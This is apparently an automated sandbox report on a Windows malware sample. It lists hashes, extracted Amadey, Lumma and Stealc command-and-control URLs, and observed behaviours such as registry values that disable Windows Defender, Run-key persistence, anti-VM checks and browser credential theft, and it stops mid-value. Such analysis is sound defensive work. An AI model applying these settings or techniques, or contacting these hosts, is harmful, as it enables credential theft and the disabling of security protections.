Analysis
-
max time kernel
127s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 17:54
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
34a1010b4f6cf9c985d71453702602d7
-
SHA1
266541f9f120e4d4b79ebb5687bbe8a045281b6b
-
SHA256
ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09
-
SHA512
fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d
-
SSDEEP
49152:F8WzsvHzPOk2md5JvUHV7qA3aJuFi8/y:F8gcOZmFsJZ3kCin
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://zfurrycomp.top/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://larisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://dawtastream.bet/api
https://foresctwhispers.top/api
https://tracnquilforest.life/api
https://xcollapimga.fun/api
https://strawpeasaen.fun/api
https://jquietswtreams.life/api
https://starrynsightsky.icu/api
https://earthsymphzony.today/api
https://defaulemot.run/api
https://arisechairedd.shop/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 6 IoCs
resource yara_rule behavioral1/memory/2756-126-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2756-124-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2756-121-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2756-119-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2756-129-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2756-127-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer -
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x0006000000019621-181.dat family_vidar_v7 -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/2396-1046-0x0000000000BF0000-0x0000000000E9C000-memory.dmp healer behavioral1/memory/2396-1047-0x0000000000BF0000-0x0000000000E9C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 357210bdae.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 357210bdae.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 357210bdae.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 357210bdae.exe -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1f63359651.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0af8120bbc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 899dbfe959.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 357210bdae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bncn6rv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7c80f0564f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d875f8b7d2.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 2792 powershell.exe 7 332 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 620 powershell.exe 3664 powershell.exe 332 powershell.exe 3284 powershell.exe 620 powershell.exe 3664 powershell.exe 2792 powershell.exe 1852 powershell.exe 912 powershell.exe 2656 powershell.exe 2920 powershell.exe -
Downloads MZ/PE file 24 IoCs
flow pid Process 202 2688 rapes.exe 205 3856 bncn6rv.exe 205 3856 bncn6rv.exe 205 3856 bncn6rv.exe 205 3856 bncn6rv.exe 205 3856 bncn6rv.exe 205 3856 bncn6rv.exe 205 3856 bncn6rv.exe 192 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 5 2688 rapes.exe 52 2784 BitLockerToGo.exe 71 1708 BitLockerToGo.exe 6 2792 powershell.exe 7 332 powershell.exe -
Uses browser remote debugging 2 TTPs 16 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3716 chrome.exe 3808 chrome.exe 1048 chrome.exe 1236 chrome.exe 4120 chrome.exe 4876 chrome.exe 1852 chrome.exe 1480 chrome.exe 1260 chrome.exe 3724 chrome.exe 3428 chrome.exe 4112 chrome.exe 1148 chrome.exe 3828 chrome.exe 3672 chrome.exe 3320 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000400000001d8ed-1724.dat net_reactor behavioral1/memory/4428-1733-0x0000000000F80000-0x0000000000FE0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d875f8b7d2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d875f8b7d2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 899dbfe959.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 357210bdae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 357210bdae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1f63359651.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 899dbfe959.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7c80f0564f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0af8120bbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1f63359651.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7c80f0564f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0af8120bbc.exe -
Executes dropped EXE 23 IoCs
pid Process 2688 rapes.exe 1548 484742576f.exe 2660 TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE 2400 lk7ybIi.exe 2756 lk7ybIi.exe 2776 483d2fa8a0d53818306efeb32d3.exe 1316 mIrI3a9.exe 496 sqVWjvh.exe 1740 1f63359651.exe 1576 7c80f0564f.exe 1356 0af8120bbc.exe 912 9ba1970019.exe 2376 9ba1970019.exe 2908 d875f8b7d2.exe 1788 899dbfe959.exe 1980 6107dcdc10.exe 2396 357210bdae.exe 3212 sqVWjvh.exe 2388 PQkVDtx.exe 3564 COM Surrogate.exe 3220 packed.exe 3776 COM Surrogate.exe 3856 bncn6rv.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 1f63359651.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 7c80f0564f.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 0af8120bbc.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 899dbfe959.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine d875f8b7d2.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 357210bdae.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine bncn6rv.exe -
Loads dropped DLL 55 IoCs
pid Process 2172 random.exe 2172 random.exe 2688 rapes.exe 2792 powershell.exe 2792 powershell.exe 2688 rapes.exe 2400 lk7ybIi.exe 268 WerFault.exe 268 WerFault.exe 268 WerFault.exe 268 WerFault.exe 268 WerFault.exe 332 powershell.exe 332 powershell.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 912 9ba1970019.exe 2924 WerFault.exe 2924 WerFault.exe 2924 WerFault.exe 2924 WerFault.exe 2924 WerFault.exe 352 WerFault.exe 352 WerFault.exe 352 WerFault.exe 352 WerFault.exe 352 WerFault.exe 2688 rapes.exe 2688 rapes.exe 2156 WerFault.exe 2156 WerFault.exe 2156 WerFault.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2688 rapes.exe 2784 BitLockerToGo.exe 2688 rapes.exe 1708 BitLockerToGo.exe 2688 rapes.exe 2388 PQkVDtx.exe 2388 PQkVDtx.exe 2688 rapes.exe 3220 packed.exe 3220 packed.exe 2688 rapes.exe 2688 rapes.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 357210bdae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 357210bdae.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\899dbfe959.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127890101\\899dbfe959.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\6107dcdc10.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127900101\\6107dcdc10.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\357210bdae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127910101\\357210bdae.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\484742576f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126980101\\484742576f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126990121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\d875f8b7d2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127880101\\d875f8b7d2.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000800000001878c-30.dat autoit_exe behavioral1/files/0x000a000000019623-877.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2172 random.exe 2688 rapes.exe 2660 TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE 2776 483d2fa8a0d53818306efeb32d3.exe 1740 1f63359651.exe 1576 7c80f0564f.exe 1356 0af8120bbc.exe 2908 d875f8b7d2.exe 1788 899dbfe959.exe 2396 357210bdae.exe 3856 bncn6rv.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2400 set thread context of 2756 2400 lk7ybIi.exe 55 PID 1740 set thread context of 2784 1740 1f63359651.exe 80 PID 912 set thread context of 2376 912 9ba1970019.exe 84 PID 1576 set thread context of 1708 1576 7c80f0564f.exe 86 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\runtime\COM Surrogate.exe packed.exe File created C:\Program Files\runtime\COM Surrogate.exe PQkVDtx.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job random.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 268 2400 WerFault.exe 54 2924 912 WerFault.exe 83 352 2376 WerFault.exe 84 2156 2908 WerFault.exe 92 4556 4428 WerFault.exe 165 2064 4004 WerFault.exe 185 -
System Location Discovery: System Language Discovery 1 TTPs 49 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1f63359651.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0af8120bbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9ba1970019.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 357210bdae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk7ybIi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7c80f0564f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d875f8b7d2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6107dcdc10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk7ybIi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 6107dcdc10.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 6107dcdc10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 484742576f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mIrI3a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqVWjvh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9ba1970019.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqVWjvh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bncn6rv.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sqVWjvh.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sqVWjvh.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sqVWjvh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sqVWjvh.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 352 timeout.exe 1552 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer PQkVDtx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 1984 taskkill.exe 916 taskkill.exe 1492 taskkill.exe 2860 taskkill.exe 2184 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 sqVWjvh.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a sqVWjvh.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 